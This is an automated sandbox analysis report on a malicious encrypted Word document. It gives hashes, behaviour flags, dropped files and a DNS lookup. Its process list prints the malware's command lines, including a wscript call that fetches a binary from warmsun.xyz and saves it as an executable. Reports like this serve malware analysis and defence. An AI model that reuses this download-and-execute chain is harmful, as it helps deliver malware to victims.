analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

inv_475481.doc

Full analysis: https://app.any.run/tasks/5a18858d-e2dd-4d4d-8c53-8eed9c5e3851
Verdict: Malicious activity
Analysis date: February 21, 2020, 23:04:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
encrypted
maldoc-8
Indicators:
MIME: application/encrypted
File info: CDFV2 Encrypted
MD5:

DF2587EFC0598D4AFA62C293D472F8D1

SHA1:

EB0C3F8A0BEAED7C835B3B3BFB746DD6713EF957

SHA256:

5BA417F02473E61AEBD5BE2DF8D8CE969A45E50340DA529EA6E25EFCAA76B110

SSDEEP:

768:r2FfTj0pCPhs0YpII0gUJn9KGIpwv/up6YsK85jfJbRQaUyGyjLSLO3lgg2222h7:rmH0Ab/K4/up6YtyJbRQaUbyjcO3OLjU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3964)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3964)
  • SUSPICIOUS

    • Executes scripts

      • cmd.exe (PID: 2844)
      • cmd.exe (PID: 2152)
  • INFO

    • Manual execution by user

      • cmd.exe (PID: 3068)
      • cmd.exe (PID: 2844)
      • explorer.exe (PID: 2852)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3964)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3964)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
49
Monitored processes
7
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs wscript.exe no specs explorer.exe no specs cmd.exe no specs cmd.exe no specs wscript.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3964"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\inv_475481.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2152cmd /c ""C:\DecemberLogs\Restaraunt2.cmd" "C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2956wscript //nologo c:\DecemberLogs\OliviaMatter.vbs http://warmsun.xyz/xelfbiuojlwgbyumvyzb/frllo.bin C:\DecemberLogs\Caff54e1.exeC:\Windows\system32\wscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
1
Version:
5.8.7600.16385
2852"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3068cmd /c ""C:\DecemberLogs\Restaraunt1.cmd" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2844cmd /c ""C:\DecemberLogs\Restaraunt2.cmd" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2596wscript //nologo c:\DecemberLogs\OliviaMatter.vbs http://warmsun.xyz/xelfbiuojlwgbyumvyzb/frllo.bin C:\DecemberLogs\Caff54e1.exeC:\Windows\system32\wscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
Total events
1 874
Read events
1 071
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
100
Unknown types
6

Dropped files

PID
Process
Filename
Type
3964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6C20.tmp.cvr
MD5:
SHA256:
3964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF617E636170C2E8AF.TMP
MD5:
SHA256:
3964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF52C7C7BF9D9CD3C8.TMP
MD5:
SHA256:
3964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFAE26345224E0501A.TMP
MD5:
SHA256:
3964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFACDE1F62BBEF5056.TMP
MD5:
SHA256:
3964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF415495C361EE8DD1.TMP
MD5:
SHA256:
3964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFC903E7C4F7F8AEAF.TMP
MD5:
SHA256:
3964WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8705E7D35117CF605EF761D225C1F1E3
SHA256:2741B38EAA68EE329063F9DF6B38F992B6C4BAD6A2490BBE43B6310F28C2FB0C
3964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$v_475481.docpgc
MD5:2B2F676EAEE5489FEDDE5F956FF3A690
SHA256:CAB5CCC40282F9C955BB4A76A33DDB5850A880E75A630D6A07507D875891FDEF
3964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\NODEMGRLib.exdtlb
MD5:89894A7B31618BBB9E518B171D543E12
SHA256:F17859E8E162B0BC095A41FE7EC67A955BF5C7F178E8FE9497125D7471DC0F02
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
7
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
warmsun.xyz
suspicious

Threats

No threats detected
No debug info